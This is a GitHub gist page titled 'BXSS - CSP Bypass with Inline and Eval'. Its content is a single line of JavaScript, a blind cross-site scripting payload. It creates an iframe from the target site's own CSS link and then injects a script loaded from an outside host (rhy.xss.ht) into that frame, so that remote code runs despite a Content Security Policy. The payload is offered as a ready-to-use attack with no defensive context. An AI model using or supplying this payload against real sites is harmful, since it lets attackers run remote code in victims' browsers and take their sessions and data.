Forked from Rhynorater/gist:311cf3981fda8303d65c27316e69209f
Created
November 9, 2020 11:34
-
-
Save JarLob/89165857ac88db59e3f8bf6db98c2563 to your computer and use it in GitHub Desktop.
BXSS - CSP Bypass with Inline and Eval
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment